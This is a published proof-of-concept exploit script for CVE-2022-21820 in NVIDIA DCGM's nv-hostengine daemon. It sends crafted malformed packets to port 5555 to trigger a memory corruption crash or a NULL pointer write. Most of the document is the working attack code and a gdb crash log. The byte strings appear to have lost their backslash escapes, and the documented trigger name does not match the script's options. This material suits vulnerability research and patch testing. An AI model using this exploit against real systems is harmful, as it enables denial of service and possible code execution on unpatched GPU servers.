Authored by Jeremy Brown

NVIDIA DCGM runs on machines with NVIDIA GPUs to gather telemetry and GPU health data. nv-hostengine is a daemon that by default listens on the loopback interface, but can also listen on the network for requests coming in on port 5555 (remote mgmt). A native client named DCGMI allows users to make requests to the daemon to support a variety of functions. Malformed packets can cause the daemon (running as root or user account) to crash or potentially result in code execution. Versions less than 2.3.5 are affected.

advisories | CVE-2022-21820

#!/usr/bin/python3
# -*- coding: UTF-8 -*-
#
# heart.py
#
# NVIDIA Data Center GPU Manager Remote Memory Corruption Vulnerability
#
# Jeremy Brown [jbrown3264/gmail]
#
# NVIDIA DCGM runs on machines with NVIDIA GPUs to gather telemetry and GPU health
# data. nv-hostengine is a daemon that by default listens on the loopback interface,
# but can also listen on the network for requests coming in on port 5555 (remote mgmt).
# A native client named DCGMI allows users to make requests to the daemon to support
# a variety of functions. Malformed packets can cause the daemon (running as root
# or user account) to crash or potentially result in code execution.
#
# More info: https://docs.nvidia.com/datacenter/dcgm/latest/index.html
#
# Tested on Ubuntu 20.04 x64 with package datacenter-gpu-manager v2.3.1 (< v2.3.5 affected)
#
# $ ./heart.py 10.0.0.201 --trigger pkt3-mem
#
# $ gdb `which nv-hostengine`
# (gdb) r -b ALL -n
# nv-hostengine running as non-root. Some functionality will be limited.
# Started host engine version 2.3.1 using port number: 5555
# ...
# Thread 2 "nv-hostengine" received signal SIGSEGV, Segmentation fault.
#
# (gdb) i r
# rax 0x7ffbb3dbd010 140719031046160
# rbx 0x7ffff771ac70 140737344810096
# rcx 0x7ffbb3dbd010 140719031046160
# rdx 0x424242420 17786217504
# rsi 0x7ffff771aee4 140737344810724
# rdi 0x7ffbb3dbd010 140719031046160
# rbp 0x7ffff771ac40 0x7ffff771ac40
# rsp 0x7ffff771abe8 0x7ffff771abe8
# r8 0x424242420 17786217504
# r9 0x0 0
# r10 0x7ffbb3dbd010 140719031046160
#
# CVE‑2022‑21820
#

import os
import sys
import argparse
import time
import shutil
import signal
import socket

DEFAULT_PORT = 5555

PKT_START = b'xadxbcxbcxad'

#
# Trigger #1: Memory Corruption via malformed packet 3
#
TRIGGER_ONE_PKT_1 = PKT_START +
b'x01x00x00x00x11x00x00x00x00x01x00x00x00x00x00x00x0ax0fx08x03x10x03x18x00x28x00x42x05xc2x01x02x08x00'

TRIGGER_ONE_PKT_2 = PKT_START +
b'x01x00x00x00x1ax00x00x00x00x02x00x00x00x00x00x00x0ax18x08x03x10x03x18x00x28x00x42x05xc2x01x02x08x00x48xa4xecxc4x94x81x83xf5x02'

# 0x84 maps to 'B' here and crashes with rdx/r8=0x424242420
TRIGGER_ONE_PKT_3 = PKT_START +
b'x03x00x00x00x3ax03x00x00x00x01x00x00x00x00x00x00x0axb7x06x08x38x10x03x18x00x28x00x42xacx06xaax01xa8x06x28x03x00x01x00' +
b'x84' * 51 +
b'x00' * 488 +
b'x19x00x00x00x9ex00x9fx00xa4x00xa0x00xa3x00xa2x00xa1x00x82x00x36x00x55x00x52x00x33x00x32x00x35x00x39x00x3ax00x3bx00x5ax00xfax00xfcx00xfbx00x01x00xf4x01x42x00x43' +
b'x00' * 207 +
b'x01x00x00x00'

#
# Trigger #2: NULL ptr write via malformed packet 4
#
TRIGGER_TWO_PKT_1 = TRIGGER_ONE_PKT_1

TRIGGER_TWO_PKT_2 = TRIGGER_ONE_PKT_2

TRIGGER_TWO_PKT_3 = PKT_START +
b'x03x00x00x00x3ax03x00x00x00x01x00x00x00x00x00x00x0axb7x06x08x38x10x03x18x00x28x00x42xacx06xaax01xa8x06x28x03x00x01' +
b'x00' * 12 +
b'x01x00x00x00x01' +
b'x00' * 523 +
b'x19x00x00x00x9ex00x9fx00xa4x00xa0x00xa3x00xa2x00xa1x00x82x00x36x00x55x00x52x00x33x00x32x00x35x00x39x00x3ax00x3bx00x5ax00xfax00xfcx00xfbx00x01x00xf4x01x42x00x43' +
b'x00' * 207 +
b'x01x00x00x00'

# 0x79 triggers crash
TRIGGER_TWO_PKT_4 = PKT_START +
b'x04x00x00x00x1cx00x00x00x00x01x00x00x00x00x00x00x0ax1ax08x04x10x03x18' +
b'xff' * 9 +
b'x01' +
b'x79' +
b'x00x42x07xd2x01x04x08x03x10x00'

class Heart(object):
def __init__(self, args):
self.host = args.host
self.trigger = args.trigger

def run(self):
if(self.trigger == None):
print("error: choose which bug use via --trigger")
return -1

sock = self.getSock()

if(sock == None):
return -1

try:
sock.connect((self.host, DEFAULT_PORT))
except Exception as error:
print("connect() failed: %sn" % error)
return -1

if(self.trigger == 'pkt3_mem'):
if(self.sendPacket(sock, TRIGGER_ONE_PKT_1) < 0):
print("failed to send/recv packet 1n")
return -1

if(self.sendPacket(sock, TRIGGER_ONE_PKT_2) < 0):
print("failed to send/recv packet 2n")
return -1

if(self.sendPacket(sock, TRIGGER_ONE_PKT_3) < 0):
print("failed to send/recv packet 3n")
return -1

if(self.trigger == 'pkt4_null'):
if(self.sendPacket(sock, TRIGGER_TWO_PKT_1) < 0):
print("failed to send/recv packet 1n")
return -1

if(self.sendPacket(sock, TRIGGER_TWO_PKT_2) < 0):
print("failed to send/recv packet 2n")
return -1

if(self.sendPacket(sock, TRIGGER_TWO_PKT_3) < 0):
print("failed to send/recv packet 3n")
return -1

if(self.sendPacket(sock, TRIGGER_TWO_PKT_4) < 0):
print("failed to send/recv packet 4n")
return -1

print("donen")

return 0

def getSock(self):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2)
except Exception as error:
print("socket() failed: %sn" % error)
return None

return sock

def sendPacket(self, sock, pkt):
try:
sock.send(pkt)
except Exception as error:
print("socket send error: %sn" % error)
return -1

try:
sock.recv(256)
except Exception as error:
# print("socket recv error: %sn" % error)
return 0 # expected for pkt3_mem

return 0

def signalExit(signum, frame):
sys.exit(-1)

def arg_parse():
parser = argparse.ArgumentParser()

parser.add_argument("host",
type=str,
help="target host")

parser.add_argument("--trigger",
"--trigger",
type=str,
choices=['pkt3_mem', 'pkt4_null'],
help="which bug to trigger")

args = parser.parse_args()

return args

def main():
signal.signal(signal.SIGINT, signalExit)

args = arg_parse()

rh = Heart(args)

result = rh.run()

if(result > 0):
sys.exit(-1)

if(__name__ == '__main__'):
main()